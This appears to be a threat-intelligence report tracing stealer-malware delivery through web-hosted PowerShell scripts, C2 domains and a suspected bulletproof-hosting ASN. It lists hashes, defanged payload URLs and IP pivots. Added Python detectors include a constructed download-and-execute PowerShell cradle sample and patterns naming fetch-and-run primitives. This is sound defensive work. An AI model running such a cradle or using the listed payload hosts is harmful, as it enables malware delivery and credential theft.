Details

Hunting for new malware delivery infrastructure often entails identifying and tracking the common techniques used to deliver the various stages of malware. Take malware-as-a-service providers, for instance: one commonality in a recent activity cluster was the use of web-hosted PowerShell scripts acting as a pointer to the next piece of malware to download and execute.

Multiple clusters of stealer activity were observed through early July using PowerShell scripts as an intermediate stage for malware delivery. Creating multiple stages of delivery reduces the initial risk of exposing all malware and associated infrastructure if it is detected early on in execution. It may also slow down response investigations and analysis. 

Hunting for malicious web-hosted PowerShell scripts can be as simple as using a Shodan query such as: http.html:"Invoke-WebRequest".

Example Finding:
77.110.118.195 Resolved malicious domain “alababababa[.]cloud”.

A reused web-hosted PowerShell script retrieves a malicious executable, build.exe, which it then starts as a new process.
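The download-then-launch shape of that stage-1 script is something a defender can flag directly in fetched content. The following is an added example, not code from the original post: it scans a PowerShell text for a fetch primitive paired with a launch primitive and extracts the URL and output path. The sample scripts, hostnames and paths inside it are constructed for the demonstration.

```python
import re
from typing import Dict

# Added example (not from the original post): flag a web-hosted PowerShell
# text that fetches a payload and then launches it, the two-step pattern the
# post describes (download build.exe, then start it as a new process).

# Cmdlets and aliases that fetch content over HTTP(S).
DOWNLOAD_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|wget|curl|Invoke-RestMethod|irm|"
    r"Start-BitsTransfer|DownloadFile|DownloadString)\b",
    re.IGNORECASE,
)
# Ways of launching what was fetched.
EXEC_RE = re.compile(
    r"\b(Start-Process|saps|Invoke-Expression|iex|Invoke-Item)\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
OUTFILE_RE = re.compile(r"-OutFile\s+['\"]?([^\s'\"]+)", re.IGNORECASE)


def analyze_powershell(text: str) -> Dict[str, object]:
    """Return the indicators found and whether the text looks like a
    download-and-execute cradle (both a fetch and a launch primitive)."""
    downloads = sorted({m.group(1).lower() for m in DOWNLOAD_RE.finditer(text)})
    launches = sorted({m.group(1).lower() for m in EXEC_RE.finditer(text)})
    return {
        "download_primitives": downloads,
        "exec_primitives": launches,
        "urls": URL_RE.findall(text),
        "outfiles": OUTFILE_RE.findall(text),
        "is_cradle": bool(downloads and launches),
    }


# Constructed sample: a stage-1 script shaped like the one the post describes.
SAMPLE_CRADLE = (
    "$u = 'http://stage.example/build.exe'\n"
    "Invoke-WebRequest -Uri $u -OutFile \"$env:TEMP\\build.exe\"\n"
    "Start-Process \"$env:TEMP\\build.exe\"\n"
)
# Constructed benign text: fetches content but never launches anything.
SAMPLE_BENIGN = "iwr https://example.org/status.json | ConvertFrom-Json\n"

if __name__ == "__main__":
    for name, body in (("cradle", SAMPLE_CRADLE), ("benign", SAMPLE_BENIGN)):
        print(name, analyze_powershell(body))
```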

Filename: build.exe
Sha256: 7ada4d7dfc00943780cb51ea182c7a221953cdabc394011204ba5cd8e4e8f0d3

This script acts as a trojan and connects to a commonly used C2 domain, “anodes[.]pro”, which has communicated with more than 60 malicious files in the past 2 months, including multiple stealer malware families such as Amadey, Lumma, Luca, DeerStealer, and RedLine, as well as other malware families including Rugmi, BlackBasta, and DarkGate.

Expanding on the domain behavior in VirusTotal, one additional DeerStealer sample was identified, which also used the same C2 domain. 

Sha256: bd269a6328de0e534f4d8c3a42ea88a4343168053f63da0da95318f4ed17e705

Expanding on the associated infrastructure of the identified intermediary domain “alababababa[.]cloud” through domain registration overlaps identified potentially related activity.

  • NameServer: cloudflare[.]com
  • IP ISP: CloudFlare Inc
  • Address: compliance_abuse[@]webnic[.]cc
  • Registrar: WebNIC
  • SSL Issuer: WE1
alababababa[.]cloud
hugevcdn[.]pro
anodes[.]pro
servicesmesh[.]pro
interconstructionsite[.]pro
zurichinsurince[.]com
zhuchengsantian[.]com

Repeating the previous steps identifies additional malware with commonalities in stealer and C2 usage such as Amadey malware being observed with domain “hugevcdn[.]pro”.

Sha256: 02c158c63d28fd5be24424e41b70a7a361c9be8897590c0453b0d30bd6e0d842
C2: 185.156.72[.]96/te4h2nus/index.php

Similar to the C2 domain “anodes[.]pro” but at considerably higher volume, the C2 IP 185.156.72[.]96 has been observed with over 2,700 malicious files communicating with it, notably from many of the same wide range of malware-as-a-service families using it as a C2.

In addition, many of the malicious files for LummaStealer and Amadey shared the common C2 IP “185.156.72[.]96”, which overlaps with a previous LummaStealer IP, “185.156.72[.]2”.

Both IPs are part of an obscure ASN, AS61432 (TOV VAIZ PARTNER). This ASN has only one prefix (185.156.72.0/24), which shows only 1 out of 719 BGP peer propagations for Hurricane Electric Services. The ASN claims Ukrainian origin and appears to be propagated by only one other ASN, AS50073 (Webcraft Found LLC) in Ukraine. This generally suggests the ASN is part of a bulletproof hosting service (BPHS).
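A single-prefix ASN like this is easy to watch for. The following is an added example, not code from the original post: it refangs the post's defanged indicators and checks constructed proxy log lines against the known C2 hosts and the AS61432 prefix (185.156.72.0/24) named above. The log format and the 185.156.72.200 address are constructed for the demonstration.

```python
import ipaddress
import re
from typing import List, Tuple

# Added example (not from the original post): refang the post's defanged
# indicators and flag proxy log lines whose destination is a known C2 host
# or falls inside the AS61432 prefix the post identifies as suspected BPHS.

# Prefix and hosts taken from the post; the log lines below are constructed.
SUSPECT_PREFIX = ipaddress.ip_network("185.156.72.0/24")
KNOWN_C2 = {"anodes[.]pro", "hugevcdn[.]pro", "185.156.72[.]96", "185.156.72[.]2"}


def refang(indicator: str) -> str:
    """Turn the '[.]' / '[:]' / 'hxxp' defanging used in the post into a real value."""
    return (indicator.replace("[.]", ".").replace("[:]", ":")
            .replace("hxxps", "https").replace("hxxp", "http"))


KNOWN_C2_LIVE = {refang(i) for i in KNOWN_C2}

# Constructed proxy log format: "<timestamp> <src_ip> <dst_host> <url>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def check_line(line: str) -> Tuple[bool, str]:
    """Return (flagged, reason) for one log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return False, "unparsed"
    _ts, _src, dst, _url = m.groups()
    if dst in KNOWN_C2_LIVE:
        return True, f"known C2 host {dst}"
    try:
        ip = ipaddress.ip_address(dst)
    except ValueError:
        return False, "domain not in watchlist"
    if ip in SUSPECT_PREFIX:
        return True, f"{dst} inside suspected BPHS prefix {SUSPECT_PREFIX}"
    return False, "clean"


def hunt(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (line, reason) for every line that should be escalated."""
    return [(ln, reason) for ln in lines for flagged, reason in [check_line(ln)] if flagged]


SAMPLE_LOG = [  # constructed
    "2025-07-02T10:00:01Z 10.0.0.5 185.156.72.96 http://185.156.72.96/te4h2nus/index.php",
    "2025-07-02T10:00:07Z 10.0.0.5 anodes.pro https://anodes.pro/",
    "2025-07-02T10:01:00Z 10.0.0.9 example.org https://example.org/",
    "2025-07-02T10:02:00Z 10.0.0.9 185.156.72.200 http://185.156.72.200/x",
]

if __name__ == "__main__":
    for line, reason in hunt(SAMPLE_LOG):
        print(reason, "<-", line)
```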

Example LummaStealer C2s associated with IPs 185.156.72[.]2 and 185.156.72[.]96 and the domain anodes[.]pro:


Pivoting on a reused SSH certificate (“hash:896675070” and “hash:-434889431”) from the C2 IP address identifies several historical overlaps, such as the following recent IPs:

  • 185.156.72[.]97 > 0 malicious communicating files
  • 176.46.157[.]50 > 570 malicious communicating files
  • 185.156.72[.]96 > 2,800 malicious communicating files
  • 66.114.52[.]156 > 1 malicious communicating file
  • 176.46.157[.]32 > 660 malicious communicating files

In addition, there are indications that the larger cluster of malware uses Amazon CloudFront, Amazon Global Accelerator EC2 instances, and GitHub user content to store and distribute malware, all of which create challenges in proactively blocking malicious domains.

Example 1:
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/36b05b6030459ba5435705d8b91aae11f0ba268b/NIOAHYWM.exe
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/6fd8d0859aa9d3d300bf79f3da8032b04b1ed540/OURDUBDV.exe
https[:]//github[.]com/peterson643eu/projecttop/raw/refs/heads/main/OURDUBDV.exe

Makes a request to http[:]//nexuswarps[.]shop/c
C2s: anodes[.]pro, multiport[.]shop

An SSL hash overlap with a CloudFront IP resolving to “70d9ae273c860e606f236c528381f9ca[.]cloudfront[.]net” suggests the CloudFront service may be used to relay traffic to another endpoint serving malware.

Sampling 200 of the communicating files with meaningful detection names in VirusTotal, limited to the past 3 months, shows an overrepresented share of LummaC2 and Amadey.

Despite law enforcement takedowns targeting LummaStealer infrastructure in May 2025, Lumma appears to still be operating and continues to be a prominent choice. We speculate that this particular cluster of malicious activity experimented with alternative choices during June and may have opted to continue operations with LummaStealer.

Conclusion

Despite a May 2025 law enforcement takedown targeting LummaStealer, the malware family appears to remain active and a popular choice for threat actors, particularly through bulletproof hosting services (BPHS) IPs. This analysis of observed malicious activity, with a focus on C2 IPs 185.156.72[.]96 and 185.156.72[.]2 (both part of AS61432, a suspected BPHS), suggests that while there may have been some experimentation with alternative malware during June, operations have largely continued with LummaStealer.

IOCs
